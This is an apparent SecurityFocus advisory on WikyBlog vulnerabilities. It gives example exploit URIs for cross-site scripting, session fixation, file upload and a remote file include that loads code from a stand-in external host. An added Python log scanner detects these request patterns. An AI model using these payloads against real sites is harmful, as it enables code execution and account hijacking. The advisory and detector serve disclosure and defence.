WikyBlog Multiple Remote Input Validation Vulnerabilities

An attacker can exploit these issues via a browser. To exploit the cross-site scripting and session-fixation issues, the attacker needs to entice a user to follow a malicious link.

The following example URIs demonstrate the issues:

File upload:
http://www.example.com/Wiky/index.php/Attach/(your name)?cmd=uploadform

Cross-site scripting:
http://www.example.com/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+src=http://www.example.com/HomeComputer.jpg+onload=alert(213771818860)>

Session fixation:
http://www.example.com/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation
http://www.example.com/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushkasessionfixation
http://www.example.com/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixation

Remote file include:
http://www.example.com/Wiky/include/WBmap.php?langFile=http://www.example2.com/c.txt?
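As an added example (not part of the advisory and not WikyBlog code), the scanner below walks constructed Apache-style access-log lines and flags requests that carry the three request patterns shown above: a remote URL in `langFile`, markup in the `which` template parameter, and a `;jsessionid=` path segment. The indicator names, the regular expressions and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic); the targets mirror
# the example URIs in the advisory, percent-encoded as a browser would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2010:12:00:01 +0000] "GET /Wiky/index.php/Special/Main/Templates?cmd=copy&which=%3Cimg+src%3Dhttp%3A%2F%2Fwww.example.com%2FHomeComputer.jpg+onload%3Dalert%28213771818860%29%3E HTTP/1.1" 200 512
203.0.113.5 - - [10/Mar/2010:12:00:02 +0000] "GET /Wiky/include/WBmap.php?langFile=http://www.example2.com/c.txt? HTTP/1.1" 200 128
203.0.113.5 - - [10/Mar/2010:12:00:03 +0000] "GET /Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation HTTP/1.1" 200 2048
198.51.100.7 - - [10/Mar/2010:12:00:04 +0000] "GET /Wiky/index.php/Special/Main/Templates?cmd=copy&which=MyTemplate HTTP/1.1" 200 900
"""

# Combined log format: client, identity, user, [timestamp], "METHOD target PROTO", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def classify_request(target: str) -> list[str]:
    """Return the (assumed) indicator names that match one request target."""
    hits = []
    parts = urlsplit(target)            # urlsplit keeps ';jsessionid=...' inside the path
    path = unquote(parts.path)
    params = parse_qs(parts.query, keep_blank_values=True)
    # RFI: langFile naming a remote resource (scheme:// or protocol-relative //) instead of a local file
    for value in params.get("langFile", []):
        if re.match(r"^(?:[a-z][a-z0-9+.-]*:)?//", value, re.I):
            hits.append("rfi_langFile_remote")
    # XSS: angle brackets or an on*= handler inside the template-name parameter
    for value in params.get("which", []):
        if re.search(r"[<>]|on\w+\s*=", unquote(value), re.I):
            hits.append("xss_which_markup")
    # Session fixation: a session identifier supplied as a path parameter
    if ";jsessionid=" in path.lower():
        hits.append("session_fixation_path_jsessionid")
    return hits

def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Parse log lines and return (client ip, target, indicators) for every flagged request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue                     # skip lines that are not in the expected format
        hits = classify_request(m["target"])
        if hits:
            findings.append((m["ip"], m["target"], hits))
    return findings

if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits), target)
```

Requests with a benign `which` value or a local `langFile` such as `en.php` produce no indicators, so the scanner only reports the three tampered requests in the sample.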

Copyright 2010, SecurityFocus